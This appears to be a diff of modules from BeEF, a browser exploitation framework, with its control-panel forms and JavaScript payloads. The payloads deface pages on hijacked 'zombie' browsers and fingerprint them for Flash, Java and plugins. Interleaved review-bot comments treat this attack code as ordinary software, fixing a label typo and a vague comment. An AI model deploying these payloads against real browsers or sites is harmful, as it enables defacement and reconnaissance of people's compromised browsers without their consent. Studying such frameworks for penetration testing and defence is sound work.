var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "HTMLCONTENT", document.myform.deface_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Deface Web Page', get_b64_code_deface());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_deface());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Deface Web Page</div>
This module will overwrite the content of the selected zombies with the value entered in the
'Deface String' input. <br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Deface String</div>
<input type="text" name="deface_str" value="BeEF Deface Web Page"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Deface Web Page


@@ -0,0 +1,7 @@
function do_main(){
document.body.innerHTML = "HTMLCONTENT";
}
do_main();
return_result(result_id, "Site defaced");


@@ -0,0 +1,41 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_fe() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detech Flash', get_b64_code_fe());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fe());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Flash</div>
This module will detect if Adobe Flash Player is available in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
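Review bot: The autorun label is misspelled: `ar.enable('Detech Flash', get_b64_code_fe());` should read `ar.enable('Detect Flash', get_b64_code_fe());` to match the module header and the one-line name file that follows. If the label is used as a key when autorun entries are looked up (not visible here), the typo would also keep this entry from matching its name elsewhere.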


@@ -0,0 +1 @@
Detect Flash


@@ -0,0 +1,13 @@
function do_main(){
if (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]) {
result = "Flash is available in browser";
} else {
result = "Flash is NOT available in browser";
}
}
var result = null;
do_main();
return_result(result_id, result);


@@ -0,0 +1,42 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_je() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Java', get_b64_code_je());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_je());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Java</div>
This module will detect if Java is available in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Detect Java


@@ -0,0 +1,17 @@
function do_main(){
// https://developer.mozilla.org/en/DOM/window.navigator.javaEnabled
// bug in XP SP2
if( window.navigator.javaEnabled() ) {
result = "Java is available in browser";
} else {
result = "Java is NOT available in browser";
}
}
var result = null;
do_main();
return_result(result_id, result);
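Review bot: The comment `// bug in XP SP2` in `do_main` does not say what the bug is or how it affects the value of `javaEnabled()`, so a reader cannot tell whether the reported string is reliable on that platform. Either expand it to one sentence describing the behaviour and its effect on `result`, or drop it. `result` is declared with `var result = null;` after the function that assigns it; moving the declaration above `do_main` reads more naturally.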


@@ -0,0 +1,41 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_gp() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Plugins', get_b64_code_gp());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_gp());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Plugins</div>
This module will retrieve the selected zombie browser plugins.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
